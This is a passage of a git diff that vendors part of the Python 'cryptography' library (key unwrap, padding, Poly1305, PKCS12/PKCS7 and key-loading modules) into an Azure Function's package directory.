n = 1 + else: + r = [wrapped_key[i : i + 8] for i in range(0, len(wrapped_key), 8)] + encrypted_aiv = r.pop(0) + n = len(r) + a, r = _unwrap_core(wrapping_key, encrypted_aiv, r) + data = b"".join(r) + + # 1) Check that MSB(32,A) = A65959A6. + # 2) Check that 8*(n-1) < LSB(32,A) <= 8*n. If so, let + # MLI = LSB(32,A). + # 3) Let b = (8*n)-MLI, and then check that the rightmost b octets of + # the output data are zero. + mli = int.from_bytes(a[4:], byteorder="big") + b = (8 * n) - mli + if ( + not bytes_eq(a[:4], b"\xa6\x59\x59\xa6") + or not 8 * (n - 1) < mli <= 8 * n + or (b != 0 and not bytes_eq(data[-b:], b"\x00" * b)) + ): + raise InvalidUnwrap() + + if b == 0: + return data + else: + return data[:-b] + + +def aes_key_unwrap( + wrapping_key: bytes, + wrapped_key: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapped_key) < 24: + raise InvalidUnwrap("Must be at least 24 bytes") + + if len(wrapped_key) % 8 != 0: + raise InvalidUnwrap("The wrapped key must be a multiple of 8 bytes") + + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + aiv = b"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6" + r = [wrapped_key[i : i + 8] for i in range(0, len(wrapped_key), 8)] + a = r.pop(0) + a, r = _unwrap_core(wrapping_key, a, r) + if not bytes_eq(a, aiv): + raise InvalidUnwrap() + + return b"".join(r) + + +class InvalidUnwrap(Exception): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/padding.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/padding.py new file mode 100644 index 0000000..ead73dc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/padding.py @@ -0,0 +1,224 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography import utils +from cryptography.exceptions import AlreadyFinalized +from cryptography.hazmat.bindings._rust import ( + check_ansix923_padding, + check_pkcs7_padding, +) + + +class PaddingContext(metaclass=abc.ABCMeta): + @abc.abstractmethod + def update(self, data: bytes) -> bytes: + """ + Pads the provided bytes and returns any available data as bytes. + """ + + @abc.abstractmethod + def finalize(self) -> bytes: + """ + Finalize the padding, returns bytes. 
+ """ + + +def _byte_padding_check(block_size: int) -> None: + if not (0 <= block_size <= 2040): + raise ValueError("block_size must be in range(0, 2041).") + + if block_size % 8 != 0: + raise ValueError("block_size must be a multiple of 8.") + + +def _byte_padding_update( + buffer_: typing.Optional[bytes], data: bytes, block_size: int +) -> typing.Tuple[bytes, bytes]: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + utils._check_byteslike("data", data) + + buffer_ += bytes(data) + + finished_blocks = len(buffer_) // (block_size // 8) + + result = buffer_[: finished_blocks * (block_size // 8)] + buffer_ = buffer_[finished_blocks * (block_size // 8) :] + + return buffer_, result + + +def _byte_padding_pad( + buffer_: typing.Optional[bytes], + block_size: int, + paddingfn: typing.Callable[[int], bytes], +) -> bytes: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + pad_size = block_size // 8 - len(buffer_) + return buffer_ + paddingfn(pad_size) + + +def _byte_unpadding_update( + buffer_: typing.Optional[bytes], data: bytes, block_size: int +) -> typing.Tuple[bytes, bytes]: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + utils._check_byteslike("data", data) + + buffer_ += bytes(data) + + finished_blocks = max(len(buffer_) // (block_size // 8) - 1, 0) + + result = buffer_[: finished_blocks * (block_size // 8)] + buffer_ = buffer_[finished_blocks * (block_size // 8) :] + + return buffer_, result + + +def _byte_unpadding_check( + buffer_: typing.Optional[bytes], + block_size: int, + checkfn: typing.Callable[[bytes], int], +) -> bytes: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + if len(buffer_) != block_size // 8: + raise ValueError("Invalid padding bytes.") + + valid = checkfn(buffer_) + + if not valid: + raise ValueError("Invalid padding bytes.") + + pad_size = buffer_[-1] + return buffer_[:-pad_size] + + +class PKCS7: + def __init__(self, block_size: int): + _byte_padding_check(block_size) + self.block_size = block_size + + def padder(self) -> PaddingContext: + return _PKCS7PaddingContext(self.block_size) + + def unpadder(self) -> PaddingContext: + return _PKCS7UnpaddingContext(self.block_size) + + +class _PKCS7PaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_padding_update( + self._buffer, data, self.block_size + ) + return result + + def _padding(self, size: int) -> bytes: + return bytes([size]) * size + + def finalize(self) -> bytes: + result = _byte_padding_pad( + self._buffer, self.block_size, self._padding + ) + self._buffer = None + return result + + +class _PKCS7UnpaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_unpadding_update( + self._buffer, data, self.block_size + ) + return result + + def finalize(self) -> bytes: + result = _byte_unpadding_check( + self._buffer, self.block_size, check_pkcs7_padding + ) + self._buffer = None + return result + + +class ANSIX923: + def __init__(self, block_size: int): + _byte_padding_check(block_size) 
+ self.block_size = block_size + + def padder(self) -> PaddingContext: + return _ANSIX923PaddingContext(self.block_size) + + def unpadder(self) -> PaddingContext: + return _ANSIX923UnpaddingContext(self.block_size) + + +class _ANSIX923PaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_padding_update( + self._buffer, data, self.block_size + ) + return result + + def _padding(self, size: int) -> bytes: + return bytes([0]) * (size - 1) + bytes([size]) + + def finalize(self) -> bytes: + result = _byte_padding_pad( + self._buffer, self.block_size, self._padding + ) + self._buffer = None + return result + + +class _ANSIX923UnpaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_unpadding_update( + self._buffer, data, self.block_size + ) + return result + + def finalize(self) -> bytes: + result = _byte_unpadding_check( + self._buffer, + self.block_size, + check_ansix923_padding, + ) + self._buffer = None + return result diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/poly1305.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/poly1305.py new file mode 100644 index 0000000..6a47f14 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/poly1305.py @@ -0,0 +1,60 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
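[Editor's note] The padding module above takes its block size in bits and streams data through update()/finalize(). A minimal PKCS#7 round trip for AES's 128-bit blocks (sample plaintext is illustrative):

from cryptography.hazmat.primitives import padding

padder = padding.PKCS7(128).padder()
padded = padder.update(b"short plaintext") + padder.finalize()
assert len(padded) % 16 == 0  # now a whole number of 128-bit blocks

unpadder = padding.PKCS7(128).unpadder()
data = unpadder.update(padded) + unpadder.finalize()
assert data == b"short plaintext"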
+ +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.backends.openssl.poly1305 import _Poly1305Context + + +class Poly1305: + _ctx: typing.Optional[_Poly1305Context] + + def __init__(self, key: bytes): + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.poly1305_supported(): + raise UnsupportedAlgorithm( + "poly1305 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_MAC, + ) + self._ctx = backend.create_poly1305_ctx(key) + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + utils._check_byteslike("data", data) + self._ctx.update(data) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + mac = self._ctx.finalize() + self._ctx = None + return mac + + def verify(self, tag: bytes) -> None: + utils._check_bytes("tag", tag) + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + ctx, self._ctx = self._ctx, None + ctx.verify(tag) + + @classmethod + def generate_tag(cls, key: bytes, data: bytes) -> bytes: + p = Poly1305(key) + p.update(data) + return p.finalize() + + @classmethod + def verify_tag(cls, key: bytes, data: bytes, tag: bytes) -> None: + p = Poly1305(key) + p.update(data) + p.verify(tag) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__init__.py new file mode 100644 index 0000000..56acaf9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__init__.py @@ -0,0 +1,45 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
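[Editor's note] Poly1305 above requires OpenSSL support and a 256-bit key; the classmethods wrap the update/finalize flow. A minimal sketch (the key and message are illustrative):

import os
from cryptography.hazmat.primitives.poly1305 import Poly1305

key = os.urandom(32)  # Poly1305 keys are 32 bytes and must never be reused
tag = Poly1305.generate_tag(key, b"message to authenticate")
Poly1305.verify_tag(key, b"message to authenticate", tag)  # raises InvalidSignature on mismatch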
+ + +from cryptography.hazmat.primitives._serialization import ( + BestAvailableEncryption, + Encoding, + KeySerializationEncryption, + NoEncryption, + ParameterFormat, + PrivateFormat, + PublicFormat, +) +from cryptography.hazmat.primitives.serialization.base import ( + load_der_parameters, + load_der_private_key, + load_der_public_key, + load_pem_parameters, + load_pem_private_key, + load_pem_public_key, +) +from cryptography.hazmat.primitives.serialization.ssh import ( + load_ssh_private_key, + load_ssh_public_key, +) + + +__all__ = [ + "load_der_parameters", + "load_der_private_key", + "load_der_public_key", + "load_pem_parameters", + "load_pem_private_key", + "load_pem_public_key", + "load_ssh_private_key", + "load_ssh_public_key", + "Encoding", + "PrivateFormat", + "PublicFormat", + "ParameterFormat", + "KeySerializationEncryption", + "BestAvailableEncryption", + "NoEncryption", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..f18a71d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..d3d46b7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc new file mode 100644 index 0000000..7bc480c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc new file mode 100644 index 0000000..38fcba3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc new file mode 
100644 index 0000000..c50851a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/base.py new file mode 100644 index 0000000..75d604a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/base.py @@ -0,0 +1,64 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography.hazmat.primitives.asymmetric import dh +from cryptography.hazmat.primitives.asymmetric.types import ( + PRIVATE_KEY_TYPES, + PUBLIC_KEY_TYPES, +) + + +def load_pem_private_key( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> PRIVATE_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pem_private_key(data, password) + + +def load_pem_public_key( + data: bytes, backend: typing.Any = None +) -> PUBLIC_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pem_public_key(data) + + +def load_pem_parameters( + data: bytes, backend: typing.Any = None +) -> "dh.DHParameters": + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pem_parameters(data) + + +def load_der_private_key( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> PRIVATE_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_der_private_key(data, password) + + +def load_der_public_key( + data: bytes, backend: typing.Any = None +) -> PUBLIC_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_der_public_key(data) + + +def load_der_parameters( + data: bytes, backend: typing.Any = None +) -> "dh.DHParameters": + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_der_parameters(data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs12.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs12.py new file mode 100644 index 0000000..f3c1487 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs12.py @@ -0,0 +1,219 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
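[Editor's note] The loaders in base.py above simply delegate to the OpenSSL backend. A minimal sketch of loading an unencrypted PEM private key; the file name is illustrative:

from cryptography.hazmat.primitives import serialization

with open("key.pem", "rb") as f:
    private_key = serialization.load_pem_private_key(f.read(), password=None)
# for an encrypted key, pass the passphrase as bytes instead of None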
+ +import typing + +from cryptography import x509 +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import ( + dsa, + ec, + ed25519, + ed448, + rsa, +) +from cryptography.hazmat.primitives.asymmetric.types import ( + PRIVATE_KEY_TYPES, +) + + +_ALLOWED_PKCS12_TYPES = typing.Union[ + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, +] + + +class PKCS12Certificate: + def __init__( + self, + cert: x509.Certificate, + friendly_name: typing.Optional[bytes], + ): + if not isinstance(cert, x509.Certificate): + raise TypeError("Expecting x509.Certificate object") + if friendly_name is not None and not isinstance(friendly_name, bytes): + raise TypeError("friendly_name must be bytes or None") + self._cert = cert + self._friendly_name = friendly_name + + @property + def friendly_name(self) -> typing.Optional[bytes]: + return self._friendly_name + + @property + def certificate(self) -> x509.Certificate: + return self._cert + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PKCS12Certificate): + return NotImplemented + + return ( + self.certificate == other.certificate + and self.friendly_name == other.friendly_name + ) + + def __hash__(self) -> int: + return hash((self.certificate, self.friendly_name)) + + def __repr__(self) -> str: + return "<PKCS12Certificate({}, friendly_name={})>".format( + self.certificate, self.friendly_name + ) + + +class PKCS12KeyAndCertificates: + def __init__( + self, + key: typing.Optional[PRIVATE_KEY_TYPES], + cert: typing.Optional[PKCS12Certificate], + additional_certs: typing.List[PKCS12Certificate], + ): + if key is not None and not isinstance( + key, + ( + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + ), + ): + raise TypeError( + "Key must be RSA, DSA, EllipticCurve, ED25519, or ED448" + " private key, or None.
+ ) + if cert is not None and not isinstance(cert, PKCS12Certificate): + raise TypeError("cert must be a PKCS12Certificate object or None") + if not all( + isinstance(add_cert, PKCS12Certificate) + for add_cert in additional_certs + ): + raise TypeError( + "all values in additional_certs must be PKCS12Certificate" + " objects" + ) + self._key = key + self._cert = cert + self._additional_certs = additional_certs + + @property + def key(self) -> typing.Optional[PRIVATE_KEY_TYPES]: + return self._key + + @property + def cert(self) -> typing.Optional[PKCS12Certificate]: + return self._cert + + @property + def additional_certs(self) -> typing.List[PKCS12Certificate]: + return self._additional_certs + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PKCS12KeyAndCertificates): + return NotImplemented + + return ( + self.key == other.key + and self.cert == other.cert + and self.additional_certs == other.additional_certs + ) + + def __hash__(self) -> int: + return hash((self.key, self.cert, tuple(self.additional_certs))) + + def __repr__(self) -> str: + fmt = ( + "<PKCS12KeyAndCertificates(key={}, cert={}, additional_certs={})>" + ) + return fmt.format(self.key, self.cert, self.additional_certs) + + +def load_key_and_certificates( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> typing.Tuple[ + typing.Optional[PRIVATE_KEY_TYPES], + typing.Optional[x509.Certificate], + typing.List[x509.Certificate], +]: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_key_and_certificates_from_pkcs12(data, password) + + +def load_pkcs12( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> PKCS12KeyAndCertificates: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pkcs12(data, password) + + +_PKCS12_CAS_TYPES = typing.Union[ + x509.Certificate, + PKCS12Certificate, +] + + +def serialize_key_and_certificates( + name: typing.Optional[bytes], + key: typing.Optional[_ALLOWED_PKCS12_TYPES], + cert: typing.Optional[x509.Certificate], + cas: typing.Optional[typing.Iterable[_PKCS12_CAS_TYPES]], + encryption_algorithm: serialization.KeySerializationEncryption, +) -> bytes: + if key is not None and not isinstance( + key, + ( + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + ), + ): + raise TypeError( + "Key must be RSA, DSA, EllipticCurve, ED25519, or ED448" + " private key, or None.
+ ) + if cert is not None and not isinstance(cert, x509.Certificate): + raise TypeError("cert must be a certificate or None") + + if cas is not None: + cas = list(cas) + if not all( + isinstance( + val, + ( + x509.Certificate, + PKCS12Certificate, + ), + ) + for val in cas + ): + raise TypeError("all values in cas must be certificates") + + if not isinstance( + encryption_algorithm, serialization.KeySerializationEncryption + ): + raise TypeError( + "Key encryption algorithm must be a " + "KeySerializationEncryption instance" + ) + + if key is None and cert is None and not cas: + raise ValueError("You must supply at least one of key, cert, or cas") + + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.serialize_key_and_certificates_to_pkcs12( + name, key, cert, cas, encryption_algorithm + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs7.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs7.py new file mode 100644 index 0000000..db3ac8a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs7.py @@ -0,0 +1,180 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import utils +from cryptography import x509 +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ec, rsa +from cryptography.utils import _check_byteslike + + +def load_pem_pkcs7_certificates(data: bytes) -> typing.List[x509.Certificate]: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.load_pem_pkcs7_certificates(data) + + +def load_der_pkcs7_certificates(data: bytes) -> typing.List[x509.Certificate]: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.load_der_pkcs7_certificates(data) + + +def serialize_certificates( + certs: typing.List[x509.Certificate], + encoding: serialization.Encoding, +) -> bytes: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.pkcs7_serialize_certificates(certs, encoding) + + +_ALLOWED_PKCS7_HASH_TYPES = typing.Union[ + hashes.SHA1, + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, +] + +_ALLOWED_PRIVATE_KEY_TYPES = typing.Union[ + rsa.RSAPrivateKey, ec.EllipticCurvePrivateKey +] + + +class PKCS7Options(utils.Enum): + Text = "Add text/plain MIME type" + Binary = "Don't translate input data into canonical MIME format" + DetachedSignature = "Don't embed data in the PKCS7 structure" + NoCapabilities = "Don't embed SMIME capabilities" + NoAttributes = "Don't embed authenticatedAttributes" + NoCerts = "Don't embed signer certificate" + + +class PKCS7SignatureBuilder: + def __init__( + self, + data: typing.Optional[bytes] = None, + signers: typing.List[ + typing.Tuple[ + x509.Certificate, + _ALLOWED_PRIVATE_KEY_TYPES, + _ALLOWED_PKCS7_HASH_TYPES, + ] + ] = [], + additional_certs: typing.List[x509.Certificate] = [], + ): + self._data = data + self._signers = signers + self._additional_certs = additional_certs + + def set_data(self, data: bytes) -> "PKCS7SignatureBuilder": + _check_byteslike("data", data) + if self._data is not None: + raise 
ValueError("data may only be set once") + + return PKCS7SignatureBuilder(data, self._signers) + + def add_signer( + self, + certificate: x509.Certificate, + private_key: _ALLOWED_PRIVATE_KEY_TYPES, + hash_algorithm: _ALLOWED_PKCS7_HASH_TYPES, + ) -> "PKCS7SignatureBuilder": + if not isinstance( + hash_algorithm, + ( + hashes.SHA1, + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, + ), + ): + raise TypeError( + "hash_algorithm must be one of hashes.SHA1, SHA224, " + "SHA256, SHA384, or SHA512" + ) + if not isinstance(certificate, x509.Certificate): + raise TypeError("certificate must be a x509.Certificate") + + if not isinstance( + private_key, (rsa.RSAPrivateKey, ec.EllipticCurvePrivateKey) + ): + raise TypeError("Only RSA & EC keys are supported at this time.") + + return PKCS7SignatureBuilder( + self._data, + self._signers + [(certificate, private_key, hash_algorithm)], + ) + + def add_certificate( + self, certificate: x509.Certificate + ) -> "PKCS7SignatureBuilder": + if not isinstance(certificate, x509.Certificate): + raise TypeError("certificate must be a x509.Certificate") + + return PKCS7SignatureBuilder( + self._data, self._signers, self._additional_certs + [certificate] + ) + + def sign( + self, + encoding: serialization.Encoding, + options: typing.Iterable[PKCS7Options], + backend: typing.Any = None, + ) -> bytes: + if len(self._signers) == 0: + raise ValueError("Must have at least one signer") + if self._data is None: + raise ValueError("You must add data to sign") + options = list(options) + if not all(isinstance(x, PKCS7Options) for x in options): + raise ValueError("options must be from the PKCS7Options enum") + if encoding not in ( + serialization.Encoding.PEM, + serialization.Encoding.DER, + serialization.Encoding.SMIME, + ): + raise ValueError( + "Must be PEM, DER, or SMIME from the Encoding enum" + ) + + # Text is a meaningless option unless it is accompanied by + # DetachedSignature + if ( + PKCS7Options.Text in options + and PKCS7Options.DetachedSignature not in options + ): + raise ValueError( + "When passing the Text option you must also pass " + "DetachedSignature" + ) + + if PKCS7Options.Text in options and encoding in ( + serialization.Encoding.DER, + serialization.Encoding.PEM, + ): + raise ValueError( + "The Text option is only available for SMIME serialization" + ) + + # No attributes implies no capabilities so we'll error if you try to + # pass both. + if ( + PKCS7Options.NoAttributes in options + and PKCS7Options.NoCapabilities in options + ): + raise ValueError( + "NoAttributes is a superset of NoCapabilities. Do not pass " + "both values." + ) + + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.pkcs7_sign(self, encoding, options) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/ssh.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/ssh.py new file mode 100644 index 0000000..4b50c8d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/ssh.py @@ -0,0 +1,757 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
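Editor's note: taken together, the `pkcs12.py` and `pkcs7.py` modules above give the package PKCS#12 bundle serialization and PKCS#7/CMS signing. A minimal sketch of both, assuming a self-signed certificate built on the spot (the subject name, `b"secret"` password, and payload are all illustrative):

```python
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import pkcs7, pkcs12
from cryptography.x509.oid import NameOID

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "example.test")])
now = datetime.datetime.utcnow()
cert = (
    x509.CertificateBuilder()
    .subject_name(name)
    .issuer_name(name)  # self-signed for brevity
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + datetime.timedelta(days=1))
    .sign(key, hashes.SHA256())
)

# Key + certificate bundled into a password-protected PKCS#12 blob.
p12 = pkcs12.serialize_key_and_certificates(
    name=b"demo",
    key=key,
    cert=cert,
    cas=None,
    encryption_algorithm=serialization.BestAvailableEncryption(b"secret"),
)

# Detached PKCS#7 signature over a payload, DER-encoded.
sig = (
    pkcs7.PKCS7SignatureBuilder()
    .set_data(b"payload to sign")
    .add_signer(cert, key, hashes.SHA256())
    .sign(serialization.Encoding.DER, [pkcs7.PKCS7Options.DetachedSignature])
)
```

Note how the builder returns a new `PKCS7SignatureBuilder` from each call, which is what makes the fluent chaining above work.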
+ + +import binascii +import os +import re +import typing +from base64 import encodebytes as _base64_encode + +from cryptography import utils +from cryptography.exceptions import UnsupportedAlgorithm +from cryptography.hazmat.primitives.asymmetric import dsa, ec, ed25519, rsa +from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes +from cryptography.hazmat.primitives.serialization import ( + Encoding, + NoEncryption, + PrivateFormat, + PublicFormat, +) + +try: + from bcrypt import kdf as _bcrypt_kdf + + _bcrypt_supported = True +except ImportError: + _bcrypt_supported = False + + def _bcrypt_kdf( + password: bytes, + salt: bytes, + desired_key_bytes: int, + rounds: int, + ignore_few_rounds: bool = False, + ) -> bytes: + raise UnsupportedAlgorithm("Need bcrypt module") + + +_SSH_ED25519 = b"ssh-ed25519" +_SSH_RSA = b"ssh-rsa" +_SSH_DSA = b"ssh-dss" +_ECDSA_NISTP256 = b"ecdsa-sha2-nistp256" +_ECDSA_NISTP384 = b"ecdsa-sha2-nistp384" +_ECDSA_NISTP521 = b"ecdsa-sha2-nistp521" +_CERT_SUFFIX = b"-cert-v01@openssh.com" + +_SSH_PUBKEY_RC = re.compile(rb"\A(\S+)[ \t]+(\S+)") +_SK_MAGIC = b"openssh-key-v1\0" +_SK_START = b"-----BEGIN OPENSSH PRIVATE KEY-----" +_SK_END = b"-----END OPENSSH PRIVATE KEY-----" +_BCRYPT = b"bcrypt" +_NONE = b"none" +_DEFAULT_CIPHER = b"aes256-ctr" +_DEFAULT_ROUNDS = 16 +_MAX_PASSWORD = 72 + +# re is only way to work on bytes-like data +_PEM_RC = re.compile(_SK_START + b"(.*?)" + _SK_END, re.DOTALL) + +# padding for max blocksize +_PADDING = memoryview(bytearray(range(1, 1 + 16))) + +# ciphers that are actually used in key wrapping +_SSH_CIPHERS: typing.Dict[ + bytes, + typing.Tuple[ + typing.Type[algorithms.AES], + int, + typing.Union[typing.Type[modes.CTR], typing.Type[modes.CBC]], + int, + ], +] = { + b"aes256-ctr": (algorithms.AES, 32, modes.CTR, 16), + b"aes256-cbc": (algorithms.AES, 32, modes.CBC, 16), +} + +# map local curve name to key type +_ECDSA_KEY_TYPE = { + "secp256r1": _ECDSA_NISTP256, + "secp384r1": _ECDSA_NISTP384, + "secp521r1": _ECDSA_NISTP521, +} + + +def _ecdsa_key_type(public_key: ec.EllipticCurvePublicKey) -> bytes: + """Return SSH key_type and curve_name for private key.""" + curve = 